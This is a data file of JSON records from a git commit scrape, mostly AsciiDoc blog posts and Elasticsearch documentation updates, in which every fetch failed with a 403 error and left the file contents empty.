{"commit":"ecd0313fa1b85832cf3636b6bd7602a08f7211ca","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"08889c0ba715beafbfb21499bc96ef998a592956","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"085159453fa30aa3d3681de32f00ce569c30aee4","subject":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","message":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb0a20d9fedaf31371441a55407c9c88716240b4","subject":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb8160ad9994336d16ddff84f70548889b273908","subject":"adding a readme file for pre-req's etc.","message":"adding a readme file for pre-req's etc.\n","repos":"smartpcr\/hadoop-arch-book,nvoron23\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,smartpcr\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,hadooparchitecturebook\/hadoop-arch-book,smartpcr\/hadoop-arch-book,nvoron23\/hadoop-arch-book,nvoron23\/hadoop-arch-book","old_file":"ch11-data-warehousing\/oltp\/README.asciidoc","new_file":"ch11-data-warehousing\/oltp\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smartpcr\/hadoop-arch-book.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12e749f7f6f3271d14ee3386e11f9e435c466cd5","subject":"y2b create post The Power Glove (E3 2014)","message":"y2b create post The Power Glove (E3 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-13-The-Power-Glove-E3-2014.adoc","new_file":"_posts\/2014-06-13-The-Power-Glove-E3-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a93318e46cd442927b03c0404d5d7825cb644b2","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 
2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd71aafa63b647126b1fdaa4f4f828a34c3121f","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd43c81b496a077631c0344c99f0406ae42ca0e0","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e388201c0de8ac45b4af46863af4ea317469ffd6","subject":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b99ad518cd218885d04d593975ce506a2eeef671","subject":"y2b create post They Sent An Arcade Machine","message":"y2b create post They Sent An Arcade Machine","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-22-They-Sent-An-Arcade-Machine.adoc","new_file":"_posts\/2016-02-22-They-Sent-An-Arcade-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"720754599e2edf46cd644067dfb00f64534d92dc","subject":"Update 2016-10-21-2-Treffen-am-21-Oktober.adoc","message":"Update 
2016-10-21-2-Treffen-am-21-Oktober.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2016-10-21-2-Treffen-am-21-Oktober.adoc","new_file":"_posts\/2016-10-21-2-Treffen-am-21-Oktober.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"084fb21f4bf9aaf941450e6788fef208006a05fd","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce3bf52663f00a15a587b4f667a9104bcafe940","subject":"Update 2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","message":"Update 2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","new_file":"_posts\/2017-01-09-MORDERGEWALT-UND-TERRORMACHT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32e47eede58a4f574aeda03bc0d91725e9b094aa","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39e2f053ef918c36d48182120449a61c122af76e","subject":"Update 2017-02-14-Alexa.adoc","message":"Update 2017-02-14-Alexa.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Alexa.adoc","new_file":"_posts\/2017-02-14-Alexa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6442d1f75e2055a240224926d80d9a0801572427","subject":"[Docs] Add link to grok debugger docs (#25412)","message":"[Docs] Add link to grok debugger docs 
(#25412)\n\n","repos":"jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,HonzaKral\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elastic
search,lks21c\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbedb663ee1a317d8fd74005c9719af603c32145","subject":"Update 2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","message":"Update 2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","new_file":"_posts\/2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1a9833445114c3490fe09300a2e3ce0c37cc97a","subject":"Correct similarity default for 5.0 (#21144)","message":"Correct similarity default for 5.0 
(#21144)\n\n","repos":"fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,mikemccand\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,scottsom\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticse
arch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,elasticdog\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,njlawton\/elasticsearch,yanjunh\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,obourgain\/elasticsearch,mortonsykes\/elasticsearch,spiegela\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,StefanGor\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearc
h,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,vroyer\/elassandra,C-Bish\/elasticsearch,wangtuo\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,spiegela\/elasticsearch,GlenRSmith\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Shepard1212\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,JervyShi\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,MaineC\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/mapping\/params\/similarity.asciidoc","new_file":"docs\/reference\/mapping\/params\/similarity.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c630229d99dec6597f91db626978b0ddac744fd","subject":"Update 2016-03-12-secret-of-the-magic-crystals.adoc","message":"Update 2016-03-12-secret-of-the-magic-crystals.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-03-12-secret-of-the-magic-crystals.adoc","new_file":"_posts\/2016-03-12-secret-of-the-magic-crystals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6d9caeb94760aaa1de83c5bed06e484340852d","subject":"Python: Listing files and\/or directories","message":"Python: Listing files and\/or directories\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"67cca43d9c9f8168aeb92bd42404e40d36e3388d","subject":"Add Python 
notes","message":"Add Python notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f388d42c62e5d7ef7ecce2b1ab17e0a60388dfe9","subject":"Moving to asciidoc","message":"Moving to asciidoc\n","repos":"kurron\/jvm-development-environment,kurron\/jvm-development-environment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/jvm-development-environment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b547f6fb819458958b1ec0262ebfbc91934e4eaa","subject":"Improve main README file and switch to asciidoc","message":"Improve main README 